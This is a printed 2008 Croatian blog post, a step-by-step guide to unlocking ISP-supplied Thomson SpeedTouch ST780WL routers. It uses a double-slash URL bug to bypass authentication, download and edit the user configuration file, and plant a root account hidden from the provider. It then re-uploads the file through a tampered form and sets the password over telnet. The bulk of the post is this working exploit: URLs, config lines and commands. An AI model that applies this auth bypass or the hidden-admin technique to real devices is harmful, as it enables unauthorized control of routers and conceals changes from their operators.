You are on page 1of 3

Otkljuavanje Speedtouch Thomson ST780WL routera - SpeedTouch -...

1 od 3

http://www.blog.hr/print/id/1624132809/otkljucavanje-speedtouch-th...

Adresa bloga: http://speedtouch.blog.hr

Otkljuavanje Speedtouch Thomson ST780WL routera


Koliko ujem Metronet, Iskon i Amis daju taj model u najam ali zakljuanoga
Ovdje u napisati kako je to konkretno na Amisu a i na ostala dva bi trebalo
biti isto.
Princip je moda primjenjiv i na drugim modelima Thomsonovih routera
Na ovom modelu postoji bug sa duplim slashom preko kojega se onda zaobilazi
username i password.
Na routeru postoje 9 kategorija usera (ispisano od onoga sa najveim ovlastima pa do onoga sa najmanje
ovlasti):
- root -> This is the root (master) account. This user has all privileges without any exceptions or limitations.
- SuperUser -> This user can perform any service via any access channel from any access origin.
- TechnicalSupport -> This user can perform any service via any access channel from WAN origin only.
- Administrator -> This user can perform any service via any access channel from LAN or Local origin only.
- LAN_Admin -> This user can perform only LAN related configurations via any access channel from any
origin.
- Poweruser -> This user has access to the GUI (Service/overview page) via HTTP or HTTPS access channel
from LAN origin only.
- WAN_Admin -> This user can perform only WAN related configurations via any access channel from any
origin.
- User -> This user has access to the GUI (Overview pages, remote assistance) via HTTP or HTTPS access
channel from LAN origin only.
- Guest -> This user does not have any privileges.
Kod Amisa su kreirana tri accounta, jedan TechnicalSupport, jedan Administrator i jedan Poweruser.
Poweruser je account koji se dodjeljuje korisnicima a mi emo ovdje kreirati jo jedan i to root accont.
Tip accounta nije vidljiv iz suelja ako je account veeg prioriteta od accounta kojeg imamo, tako da
provajder nee biti u mogunosti vidjeti taj novo kreirani root account (iznimka je ako downloadaju
konfiguracijski fajl pa iz njega mogu vidjeti da je neto dodano).
Otkljuavanje se vri preko Firefoxa gdje e biti potrebno instalirati Firebug ekstenziju
https://addons.mozilla.org/en-US/firefox/addon/1843
Download
Slijedi downloadanje konfiguracijskog fajla pomou slash buga sa adrese
http://192.168.1.254/cgi/b/backup/user.ini//
Fajl user.ini se nee downloadati pod tim imenom ve e ime biti random generirano.
NAPOMENA: Obavezno napravite kopiju fajla za sluaj da neto krivo napravite
Otvoriti taj .ini fajl sa nekim text editorom i naite slijedee:
[ mlpuser.ini ]
add name=support password=_CYP_4a662f54693c27613345414f703e4465 role=TechnicalSupport
hash2=4a6e256c652735313f27662a4a79277b
add name=amis password=_CYP_da617a9461779f4881c62831372ea452 role=Administrator hash2=6d377d5f7c553a275c3f462d7a6d7972
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528

Kod vas e biti drugaiji hashevi (ovi su izmiljeni) tako da vas to netreba zabrinjavati.
Sad selektiramo kompletnu treu liniju koda, to jest account sa naim
userom i passwordom te pejstamo odmah liniju ispod pa to izgleda ovako:
[ mlpuser.ini ]
add name=support password=_CYP_4a662f54693c27613345414f703e4465 role=TechnicalSupport
hash2=4a6e256c652735313f27662a4a79277b
add name=amis password=_CYP_da617a9461779f4881c62831372ea452 role=Administrator hash2=6d377d5f7c553a275c3f462d7a6d7972
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528

15.5.2013. 1:07

Otkljuavanje Speedtouch Thomson ST780WL routera - SpeedTouch -...

2 od 3

http://www.blog.hr/print/id/1624132809/otkljucavanje-speedtouch-th...

Prvi hash je password za CLI pristup putem telneta dok je drugi za pristup
putem web suelja.
Sad emo izmjeniti tip usera i staviti ime za na novi root acount, za novi
username emo staviti "whr" pa e to na kraju izgledati ovako:
[ mlpuser.ini ]
add name=support password=_CYP_4a662f54693c27613345414f703e4465 role=TechnicalSupport
hash2=4a6e256c652735313f27662a4a79277b
add name=amis password=_CYP_da617a9461779f4881c62831372ea452 role=Administrator hash2=6d377d5f7c553a275c3f462d7a6d7972
add name=user password=_CYP_756a422b2128612823507855502b6b5c role=PowerUser hash2=53526d374c3c615327716a34312d2528
add name=whr password=_CYP_756a422b2128612823507855502b6b5c role=root hash2=53526d374c3c615327716a34312d2528

Sejvamo fajl i idemo dalje na drugi dio, uploadanje konfiguracijskog fajla.


Upload
Idemo na slijedeu adresu gdje emo koristiti slash bug a i firebug ekstenziju
http://192.168.1.254/cgi/b/bandr//
Kliknemo na Browse i odaberemo na editirani konfiguracijski fajl.
Mi postavimo na button "Restore Configuration Now..." pritisnemo desnu tipku mia
i odaberemo "Inspect Element" i dobivamo slijedee u donjem dijelu prozora:

Sad miem kliknemo


na crveno ispisano:
/cgi/b/restore/
Dodamo jo jedan
slash pa onda to
izgleda ovako: /cgi/b
/restore//

Sad kliknete na
"Restore
Configuration Now...",
potvrdite da ste
sigurni da
elite uploadat fajl i
priekate dok upload
ne zavri.
Rekalkulacija
Idemo na Start->Run i upiemo cmd i pritisnemo enter
Sad upiemo: telnet 192.168.1.254 i pritisnemo enter
Za username unosimo root username ili u ovom naem sluaju whr
a za password onaj password koji imate za PowerUser account.
Kad smo se ulogirali koristimo slijedeu komandu: user config password
Tipkamo ovim redom:
1. unoenje komande: user config password whrteam
2. za name unosime: whr
3. za password unosimo: whrteam
4. ponavljamo password: whrteam
5. za [role] unosimo: root
6. za [descr] unosimo naprimjer: Hack Root Account
7. za [defuser] unosimo: n
8. za [defremadmin] unosimo: n
9. za [deflocadmin] unosimo: n
Objanjenje pojmova:
n = no
y = yes
[descr] = description
[defuser] = default user
[defremadmin] = default remote admin
[deflocadmin] = default local admin
Rekalkulacija je zavrena i time smo zavrili sa otkljuavanjem.
Sad se moete logirati na root account putem web suelja
Username: whr
Password: whrteam

Nakon prijave pratite svoje najdrae blogere i kreirajte vlastite liste blogera!

15.5.2013. 1:07

Otkljuavanje Speedtouch Thomson ST780WL routera - SpeedTouch -...

3 od 3

http://www.blog.hr/print/id/1624132809/otkljucavanje-speedtouch-th...

Post je objavljen 31.01.2008. u 21:01 sati.

Nakon prijave pratite svoje najdrae blogere i kreirajte vlastite liste blogera!

15.5.2013. 1:07